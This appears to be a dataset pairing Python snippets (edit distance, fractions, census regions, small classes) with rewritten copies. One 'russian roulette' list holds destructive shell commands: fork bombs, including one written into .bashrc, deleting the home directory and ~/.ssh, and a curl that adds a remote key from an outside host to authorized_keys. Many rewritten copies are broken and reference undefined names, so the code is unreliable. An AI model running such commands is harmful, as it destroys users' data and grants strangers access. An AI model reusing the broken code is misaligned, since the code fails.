# __INIT__.PY __version__='v1.0.0'
__version__ = 'v1.0.0'
class Solution: def oneEditAway(self, first: str, second: str) -> bool: dp = [[0] * (len(first) + 1) for _ in range(len(second) + 1)] n1 = len(first) + 1 n2 = len(second) + 1 for i in range(1, n1): dp[0][i] = dp[0][i - 1] + 1 for i in range(1, n2): dp[i][0] = dp[i - 1][0] + 1 for i in range(1, n2): for j in range(1, n1): if first[j - 1] == second[i - 1]: dp[i][j] = dp[i - 1][j - 1] else: dp[i][j] = min(dp[i - 1][j - 1], dp[i][j - 1], dp[i - 1][j]) + 1 # print(dp) return dp[n2 - 1][n1 - 1] <= 1 sol = Solution() sol.oneEditAway("pale", "ple")
class Solution: def one_edit_away(self, first: str, second: str) -> bool: dp = [[0] * (len(first) + 1) for _ in range(len(second) + 1)] n1 = len(first) + 1 n2 = len(second) + 1 for i in range(1, n1): dp[0][i] = dp[0][i - 1] + 1 for i in range(1, n2): dp[i][0] = dp[i - 1][0] + 1 for i in range(1, n2): for j in range(1, n1): if first[j - 1] == second[i - 1]: dp[i][j] = dp[i - 1][j - 1] else: dp[i][j] = min(dp[i - 1][j - 1], dp[i][j - 1], dp[i - 1][j]) + 1 return dp[n2 - 1][n1 - 1] <= 1 sol = solution() sol.oneEditAway('pale', 'ple')
class Fraction: def __repr__(self): return '%s/%s' % (self.num, self.den) def __add__(self, other): num = self.num * other.den + self.den * other.num den = self.den * other.den return Fraction(num, den) def __sub__(self, other): num = self.num * other.den - self.den * other.num den = self.den * other.den return Fraction(num, den) def __mul__(self, other): return Fraction(self.num * other.num, self.den * other.den) def __div__(self, other): return Fraction(self.num * other.den, self.den * other.num)
class Fraction: def __repr__(self): return '%s/%s' % (self.num, self.den) def __add__(self, other): num = self.num * other.den + self.den * other.num den = self.den * other.den return fraction(num, den) def __sub__(self, other): num = self.num * other.den - self.den * other.num den = self.den * other.den return fraction(num, den) def __mul__(self, other): return fraction(self.num * other.num, self.den * other.den) def __div__(self, other): return fraction(self.num * other.den, self.den * other.num)
""" This module is used to represent a ROI object from the DICOMROI table in the database. """ class ROI: """ This class stores all information about a region of interest from the DICOMROI table in the database. """ def __init__(self, name: str, identity: int = -1, priority: int = -1) -> None: """ The constructor of the ROI class. :param name: The name of the region of interest. :param identity: The identity of the region of interest. :param priority: The priority of the region of interest. """ # All fields that are used for storing the properties of the region of interest. self._identity: int = identity self._name: str = name self._priority: int = priority @property def identity(self) -> int: """ The get method of the identity property. :return: The value of the _identity field. """ return self._identity @identity.setter def identity(self, value: int) -> None: """ The set method of the identity property. :param value: The new value for the identity property. :return: The method doesn't return anything. """ # Checks whether value contains valid data. if value is False: # The value contains invalid data and so the value of the property won't change. return # The property is set to it's new value. self._identity: int = value @property def name(self) -> str: """ The get method of the name property. :return: The value of the _name field. """ return self._name @name.setter def name(self, value: str) -> None: """ The set method of the name property. :param value: The new value for the name property. :return: The method doesn't return anything. """ # Checks whether value contains valid data. if value is False: # The value contains invalid data and so the value of the property won't change. return # The property is set to it's new value. self._name: str = value @property def priority(self) -> int: """ The get method of the priority property. :return: The value of the _priority field. """ return self._priority @priority.setter def priority(self, value: int): """ The set method of the priority property. :param value: The new value for the priority property. :return: The method doesn't return anything. """ # Checks whether value contains valid data. if value is False: # The value contains invalid data and so the value of the property won't change. return # The property is set to it's new value. self._priority: int = value def __eq__(self, other: object) -> bool: """ Checks whether object is equal to other object. Overrides the __eq__ method from the object class. :param other: The object to compare to. :return: Returns true if objects are equal and false if they aren't equal. """ # Checks whether other object is instance ROI. if not isinstance(other, ROI): return False # Checks whether fields are equal. if self.identity != other.identity: return False return self.name != other.name def __hash__(self) -> int: """ Calculates hash value for the object. Overrides the __hash__ method from the object class. :return: Hash value of the object. """ return hash((self.identity, self.name))
""" This module is used to represent a ROI object from the DICOMROI table in the database. """ class Roi: """ This class stores all information about a region of interest from the DICOMROI table in the database. """ def __init__(self, name: str, identity: int=-1, priority: int=-1) -> None: """ The constructor of the ROI class. :param name: The name of the region of interest. :param identity: The identity of the region of interest. :param priority: The priority of the region of interest. """ self._identity: int = identity self._name: str = name self._priority: int = priority @property def identity(self) -> int: """ The get method of the identity property. :return: The value of the _identity field. """ return self._identity @identity.setter def identity(self, value: int) -> None: """ The set method of the identity property. :param value: The new value for the identity property. :return: The method doesn't return anything. """ if value is False: return self._identity: int = value @property def name(self) -> str: """ The get method of the name property. :return: The value of the _name field. """ return self._name @name.setter def name(self, value: str) -> None: """ The set method of the name property. :param value: The new value for the name property. :return: The method doesn't return anything. """ if value is False: return self._name: str = value @property def priority(self) -> int: """ The get method of the priority property. :return: The value of the _priority field. """ return self._priority @priority.setter def priority(self, value: int): """ The set method of the priority property. :param value: The new value for the priority property. :return: The method doesn't return anything. """ if value is False: return self._priority: int = value def __eq__(self, other: object) -> bool: """ Checks whether object is equal to other object. Overrides the __eq__ method from the object class. :param other: The object to compare to. :return: Returns true if objects are equal and false if they aren't equal. """ if not isinstance(other, ROI): return False if self.identity != other.identity: return False return self.name != other.name def __hash__(self) -> int: """ Calculates hash value for the object. Overrides the __hash__ method from the object class. :return: Hash value of the object. """ return hash((self.identity, self.name))
# To import: # from twoscomplement import * def lars_reverse_twos_complement(j, bits=1): return (1<<j.bit_length()+bits) - j def lars_twos_complement(j): return (1<<(j.bit_length()))-j def build_twos_complement_down(j): origj=j prevj=0 while prevj != j: print(f'{j:10d}, {prevj^j:10d}') prevj=j j=lars_twos_complement(j) def build_reverse_twos_complement(vv): vv = list(reversed(vv)) j = vv[0] for x in vv[1:]: j = lars_reverse_twos_complement(j, x) return j def build_twos_complement_array(hm): vv = [] j = hm while j != 1: prevhm = j j = lars_twos_complement(j) if j == prevhm: break count = 0 tempj = j tempprevhm = prevhm prevtempj = tempj while tempj != tempprevhm: count+=1 tempj = lars_reverse_twos_complement(prevtempj,count) vv.append(count) vv.append(j) return vv
def lars_reverse_twos_complement(j, bits=1): return (1 << j.bit_length() + bits) - j def lars_twos_complement(j): return (1 << j.bit_length()) - j def build_twos_complement_down(j): origj = j prevj = 0 while prevj != j: print(f'{j:10d}, {prevj ^ j:10d}') prevj = j j = lars_twos_complement(j) def build_reverse_twos_complement(vv): vv = list(reversed(vv)) j = vv[0] for x in vv[1:]: j = lars_reverse_twos_complement(j, x) return j def build_twos_complement_array(hm): vv = [] j = hm while j != 1: prevhm = j j = lars_twos_complement(j) if j == prevhm: break count = 0 tempj = j tempprevhm = prevhm prevtempj = tempj while tempj != tempprevhm: count += 1 tempj = lars_reverse_twos_complement(prevtempj, count) vv.append(count) vv.append(j) return vv
class State: def __init__(self): pass def update(self): pass
class State: def __init__(self): pass def update(self): pass
LEVELS = [ ("echo 'bang'", "echo 'bang!';"), ("swap two files in your homedir", """files=(~/*); f1="${files[RANDOM % ${#files[@]}]}" f2="${files[RANDOM % ${#files[@]}]}" mv "$f1" /tmp/russianroulette mv "$f2" "$f1" mv /tmp/russianroulette "$f2" echo 'bang! two files got their names mixed up. now, which ones were they..?' """), ("replace a random file from your homedir with a kitten", """ files=(~/*); f="${files[RANDOM % ${#files[@]}]}" rm -rf "$f" curl http://placekitten.com/g/320/240 > "$f" echo 'bang!' $f 'is now a kitten' """), ("add my public key to your authorized_keys in .ssh", """mkdir -p .ssh chmod 700 ~/.ssh curl -k https://q3k.org/pubkey >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys echo 'bang! thanks for the access.'"""), ("run a forkbomb", """ forkbomb() { echo 'bang!'; forkbomb | forkbomb & } forkbomb; """), ("delete a random file from your homedir", """files=(~/*); f="${files[RANDOM % ${#files[@]}]}" rm -rf "$f" echo 'bang!' $f 'is gone forever.'"""), ("delete ~/.ssh", "rm -rf ~/.ssh; echo 'bang! no more ssh for you.'"), ("put a forkbomb in your .bashrc", """ echo ":(){ :|:& };:" >> ~/.bashrc"""), ("delete your whole homedir", """rm -rf ~; echo 'bang!' "you're homeless now." """), ]
levels = [("echo 'bang'", "echo 'bang!';"), ('swap two files in your homedir', 'files=(~/*);\nf1="${files[RANDOM % ${#files[@]}]}"\nf2="${files[RANDOM % ${#files[@]}]}"\nmv "$f1" /tmp/russianroulette\nmv "$f2" "$f1"\nmv /tmp/russianroulette "$f2"\necho \'bang! two files got their names mixed up. now, which ones were they..?\'\n'), ('replace a random file from your homedir with a kitten', '\nfiles=(~/*);\nf="${files[RANDOM % ${#files[@]}]}"\nrm -rf "$f"\ncurl http://placekitten.com/g/320/240 > "$f"\necho \'bang!\' $f \'is now a kitten\' '), ('add my public key to your authorized_keys in .ssh', "mkdir -p .ssh\nchmod 700 ~/.ssh\ncurl -k https://q3k.org/pubkey >> ~/.ssh/authorized_keys\nchmod 600 ~/.ssh/authorized_keys\necho 'bang! thanks for the access.'"), ('run a forkbomb', "\nforkbomb() {\n echo 'bang!';\n forkbomb | forkbomb &\n}\nforkbomb;\n"), ('delete a random file from your homedir', 'files=(~/*);\nf="${files[RANDOM % ${#files[@]}]}"\nrm -rf "$f"\necho \'bang!\' $f \'is gone forever.\''), ('delete ~/.ssh', "rm -rf ~/.ssh; echo 'bang! no more ssh for you.'"), ('put a forkbomb in your .bashrc', ' echo ":(){ :|:& };:" >> ~/.bashrc'), ('delete your whole homedir', 'rm -rf ~; echo \'bang!\' "you\'re homeless now." ')]
class EventPropertyError(Exception): pass class ValidationError(Exception): def __init__(self, message: str): self.message = message class RetrievalError(Exception): def __init__(self, message: str): self.message = message
class Eventpropertyerror(Exception): pass class Validationerror(Exception): def __init__(self, message: str): self.message = message class Retrievalerror(Exception): def __init__(self, message: str): self.message = message
# www.census.gov/geo/www/us_regdiv.pdf CensusDivisions = ( ('PACIFIC', 'AK HI WA OR CA'.split()), ('MOUNTAIN', 'MT ID WY NV UT CO AZ NM'.split()), ('WN_CENTRAL', 'ND SD MN NE IA KS MO'.split()), ('EN_CENTRAL', 'WI MI IL IN OH'.split()), ('WS_CENTRAL', 'OK AR TX LA'.split()), ('ES_CENTRAL', 'KY TN MS AL'.split()), ('S_ATLANTIC', 'FL GA SC NC VA WV DC MD DE'.split()), ('M_ATLANTIC', 'NY PA NJ'.split()), ('NEW_ENGLAND', 'ME NH VT MA CT RI'.split()), ) StateDivision = {} for div,states in CensusDivisions: for state in states: assert state not in StateDivision StateDivision[state] = div ## Check: postal codes from http://en.wikipedia.org/wiki/U.S._state all_states = "AL AK AZ AR CA CO CT DE FL GA HI ID IL IN IA KS KY LA ME MD MA MI MN MS MO MT NE NV NH NJ NM NY NC ND OH OK OR PA RI SC SD TN TX UT VT VA WA WV WI WY".split() all_states += ['DC'] assert len(all_states) == 51 assert set(all_states) == set(StateDivision.keys()) DivisionRegion = dict(( ('PACIFIC', 'WEST'), ('MOUNTAIN', 'WEST'), ('WN_CENTRAL', 'MIDWEST'), ('EN_CENTRAL', 'MIDWEST'), ('WS_CENTRAL', 'SOUTH'), ('ES_CENTRAL', 'SOUTH'), ('S_ATLANTIC', 'SOUTH'), ('M_ATLANTIC', 'NORTHEAST'), ('NEW_ENGLAND', 'NORTHEAST'), )) StateRegion = dict(((state, DivisionRegion[div]) for state,div in StateDivision.items()))
census_divisions = (('PACIFIC', 'AK HI WA OR CA'.split()), ('MOUNTAIN', 'MT ID WY NV UT CO AZ NM'.split()), ('WN_CENTRAL', 'ND SD MN NE IA KS MO'.split()), ('EN_CENTRAL', 'WI MI IL IN OH'.split()), ('WS_CENTRAL', 'OK AR TX LA'.split()), ('ES_CENTRAL', 'KY TN MS AL'.split()), ('S_ATLANTIC', 'FL GA SC NC VA WV DC MD DE'.split()), ('M_ATLANTIC', 'NY PA NJ'.split()), ('NEW_ENGLAND', 'ME NH VT MA CT RI'.split())) state_division = {} for (div, states) in CensusDivisions: for state in states: assert state not in StateDivision StateDivision[state] = div all_states = 'AL AK AZ AR CA CO CT DE FL GA HI ID IL IN IA KS KY LA ME MD MA MI MN MS MO MT NE NV NH NJ NM NY NC ND OH OK OR PA RI SC SD TN TX UT VT VA WA WV WI WY'.split() all_states += ['DC'] assert len(all_states) == 51 assert set(all_states) == set(StateDivision.keys()) division_region = dict((('PACIFIC', 'WEST'), ('MOUNTAIN', 'WEST'), ('WN_CENTRAL', 'MIDWEST'), ('EN_CENTRAL', 'MIDWEST'), ('WS_CENTRAL', 'SOUTH'), ('ES_CENTRAL', 'SOUTH'), ('S_ATLANTIC', 'SOUTH'), ('M_ATLANTIC', 'NORTHEAST'), ('NEW_ENGLAND', 'NORTHEAST'))) state_region = dict(((state, DivisionRegion[div]) for (state, div) in StateDivision.items()))
class Enemy: #state player_seen_at_tower = None # tower coordinates (x, y, z) player_seen = None # world coordinates vec3 # constants speed = 1 jump_speed = 5 jump_angle = 30 maxhp = 100 disappear_on_sight = False use_ranged_weapons = True use_grenades = False melee_weapon = None # should be some kind of Gun inventory_choices = [] # [[gun2, gun2], [gun3,None], [grenade1, grenade2,None,None]]
class Enemy: player_seen_at_tower = None player_seen = None speed = 1 jump_speed = 5 jump_angle = 30 maxhp = 100 disappear_on_sight = False use_ranged_weapons = True use_grenades = False melee_weapon = None inventory_choices = []
def flatten_chebi_api_attr(ch: dict, attr, _mapping: dict): val = ch.pop(attr) if isinstance(val, list): if isinstance(val[0], dict): if 'data' in val[0]: # list of dicts val = [el['data'] for el in val] else: # todo: odd composite value, should we parse these? # e.g. OntologyParents -> {chebiName, chebiId} pass else: # list of str pass # noop elif isinstance(val, dict): if 'data' in val: val = [val['data']] else: # todo: odd composite value, should we parse these? # e.g. ChemicalStructures -> {structure, type, dimension, defaultStructure} pass # make list of similar attributes newattr = _mapping.get(attr.lower(), attr.lower()) if newattr not in ch: ch[newattr] = [] ch[newattr].append(val)
def flatten_chebi_api_attr(ch: dict, attr, _mapping: dict): val = ch.pop(attr) if isinstance(val, list): if isinstance(val[0], dict): if 'data' in val[0]: val = [el['data'] for el in val] else: pass else: pass elif isinstance(val, dict): if 'data' in val: val = [val['data']] else: pass newattr = _mapping.get(attr.lower(), attr.lower()) if newattr not in ch: ch[newattr] = [] ch[newattr].append(val)
# Path to images we are extracting content and style from CONTENT_IMAGE_PATH = './coastal_scene.jpg' STYLE_IMAGE_PATH = './starry_night.jpg' # Seed for initializing numpy and tf NP_SEED = 0 TF_SEED = 0 # Path to vgg19 checkpoint, must be downloaded separately CHECKPOINT_PATH = './vgg_19.ckpt' # Location of tensorboard summaries TENSORBOARD_DIR = './train/' # Path to directory used for storing images DEBUG_DIR = './debug/' # Dimensions desired for image, channels must be kept as 3 HEIGHT = 224 WIDTH = 224 CHANNELS = 3 # Layer being used for content component CONTENT_LAYER = 'vgg_19/conv2/conv2_2' # Layers that can be used for style component STYLE_LIST = [ 'vgg_19/conv1/conv1_1', 'vgg_19/conv2/conv2_1', 'vgg_19/conv3/conv3_1', 'vgg_19/conv4/conv4_1', 'vgg_19/conv5/conv5_1' ] # Chosen depth corresponds to how many feature layers you want to use # for the style component CHOSEN_DEPTH = 2 # Weights for each loss component CONTENT_WEIGHT = 1.0 STYLE_WEIGHT = CONTENT_WEIGHT/8e-4 # Learning rate for optimizer LEARNING_RATE = 1e-1 # Number of training and validation step # In this instance, validation refers to when we would like to examine: # save currently optimized image and loss TRAINING_STEPS = 10000 VALIDATION_STEPS = 1000 # Offline debugging refers to images that will be saved to folder using plt, # every validation step DEBUG_OFFLINE = True # Determines whether information is saved between runs # for tensorboard RESET_SAVES = True
content_image_path = './coastal_scene.jpg' style_image_path = './starry_night.jpg' np_seed = 0 tf_seed = 0 checkpoint_path = './vgg_19.ckpt' tensorboard_dir = './train/' debug_dir = './debug/' height = 224 width = 224 channels = 3 content_layer = 'vgg_19/conv2/conv2_2' style_list = ['vgg_19/conv1/conv1_1', 'vgg_19/conv2/conv2_1', 'vgg_19/conv3/conv3_1', 'vgg_19/conv4/conv4_1', 'vgg_19/conv5/conv5_1'] chosen_depth = 2 content_weight = 1.0 style_weight = CONTENT_WEIGHT / 0.0008 learning_rate = 0.1 training_steps = 10000 validation_steps = 1000 debug_offline = True reset_saves = True
path = "input.txt" file = open(path) input = file.readlines() file.close() horizontal = 0 depth = 0 for item in input: dir, speed = item.split(" ") if dir == "forward": horizontal += int(speed) elif dir == "down": depth += int(speed) elif dir == "up": depth -= int(speed) else: assert False, "Unreachable" print(f"horizontal: {horizontal}, depth: {depth}, h * d = {horizontal*depth}")
path = 'input.txt' file = open(path) input = file.readlines() file.close() horizontal = 0 depth = 0 for item in input: (dir, speed) = item.split(' ') if dir == 'forward': horizontal += int(speed) elif dir == 'down': depth += int(speed) elif dir == 'up': depth -= int(speed) else: assert False, 'Unreachable' print(f'horizontal: {horizontal}, depth: {depth}, h * d = {horizontal * depth}')
# Implementantion of all PetriNet class # 1st class to be implemented is Petri Net Basic (or classic Petri Net) class PetriNet(object): """ This class contains all major object necessary to describe a complete Petri Net """ pass class Place(object): """ Class Place implements the behavior of the similar structure within a Petri Net """ pass class Transition(object): """ Class Transition implements the behavior of the same name structure within a Petri Net """ pass class Arc(object): """ Class Arc implements the behavior of the same name structure within a Petri Net """ pass class InhibitorArc(Arc): """ InhibitorArc implements the inhibitor arc behavior. It extends the features presents in the Arc class """ pass
class Petrinet(object): """ This class contains all major object necessary to describe a complete Petri Net """ pass class Place(object): """ Class Place implements the behavior of the similar structure within a Petri Net """ pass class Transition(object): """ Class Transition implements the behavior of the same name structure within a Petri Net """ pass class Arc(object): """ Class Arc implements the behavior of the same name structure within a Petri Net """ pass class Inhibitorarc(Arc): """ InhibitorArc implements the inhibitor arc behavior. It extends the features presents in the Arc class """ pass
def str_bin(s_str): st = s_str print(' '.join(format(ord(x), "b") for x in st)) def main(): str_bin("lol") if __name__ == "__main__": main() print("done")
def str_bin(s_str): st = s_str print(' '.join((format(ord(x), 'b') for x in st))) def main(): str_bin('lol') if __name__ == '__main__': main() print('done')
x = list(input("Input String: ")) x = x [::-1] j = 0 def reverseword(x): i = 0 print(int) while i !=int(len(x)/2): temp = x[i] x[i] = x[len(x)-1-i] x[len(x)-1-i] = temp i+=1 return str(x) print(reverseword(x))
x = list(input('Input String: ')) x = x[::-1] j = 0 def reverseword(x): i = 0 print(int) while i != int(len(x) / 2): temp = x[i] x[i] = x[len(x) - 1 - i] x[len(x) - 1 - i] = temp i += 1 return str(x) print(reverseword(x))
platforms = { "UA": "usaco.org", "CC": "codechef.com", "EOL":"e-olimp.com", "CH24": "ch24.org", "HR": "hackerrank.com", "HE": "hackerearth.com", "ICPC": "icfpcontest.org", "GCJ": "google.com/codejam", "DE24": "deadline24.pl", "IOI": "stats.ioinformatics.org", "PE": "projecteuler.net", "SN": "contests.snarknews.info", "CG": "codingame.com", "CF": "codeforces.com", "ELY": "e-olymp.com", "DMOJ": "dmoj.ca", "MARA": "marathon24.com", "IPSC": "ipsc.ksp.sk", "UVA": "uva.onlinejudge.org", "OPEN": "opener.itransition.com", "HSIN": "hsin.hr/coci", "CFT": "ctftime.org", "KA": "kaggle.com", "TC": "topcoder.com", "FBHC": "facebook.com/hackercup" }
platforms = {'UA': 'usaco.org', 'CC': 'codechef.com', 'EOL': 'e-olimp.com', 'CH24': 'ch24.org', 'HR': 'hackerrank.com', 'HE': 'hackerearth.com', 'ICPC': 'icfpcontest.org', 'GCJ': 'google.com/codejam', 'DE24': 'deadline24.pl', 'IOI': 'stats.ioinformatics.org', 'PE': 'projecteuler.net', 'SN': 'contests.snarknews.info', 'CG': 'codingame.com', 'CF': 'codeforces.com', 'ELY': 'e-olymp.com', 'DMOJ': 'dmoj.ca', 'MARA': 'marathon24.com', 'IPSC': 'ipsc.ksp.sk', 'UVA': 'uva.onlinejudge.org', 'OPEN': 'opener.itransition.com', 'HSIN': 'hsin.hr/coci', 'CFT': 'ctftime.org', 'KA': 'kaggle.com', 'TC': 'topcoder.com', 'FBHC': 'facebook.com/hackercup'}
"""EasyEngine exception classes.""" class EEError(Exception): """Generic errors.""" def __init__(self, msg): Exception.__init__(self) self.msg = msg def __str__(self): return self.msg class EEConfigError(EEError): """Config related errors.""" pass class EERuntimeError(EEError): """Generic runtime errors.""" pass class EEArgumentError(EEError): """Argument related errors.""" pass
"""EasyEngine exception classes.""" class Eeerror(Exception): """Generic errors.""" def __init__(self, msg): Exception.__init__(self) self.msg = msg def __str__(self): return self.msg class Eeconfigerror(EEError): """Config related errors.""" pass class Eeruntimeerror(EEError): """Generic runtime errors.""" pass class Eeargumenterror(EEError): """Argument related errors.""" pass
class SimpleGroupProvider(object): def __init__(self, *group_names): self.group_names = group_names def get_group_names(self): return self.group_names
class Simplegroupprovider(object): def __init__(self, *group_names): self.group_names = group_names def get_group_names(self): return self.group_names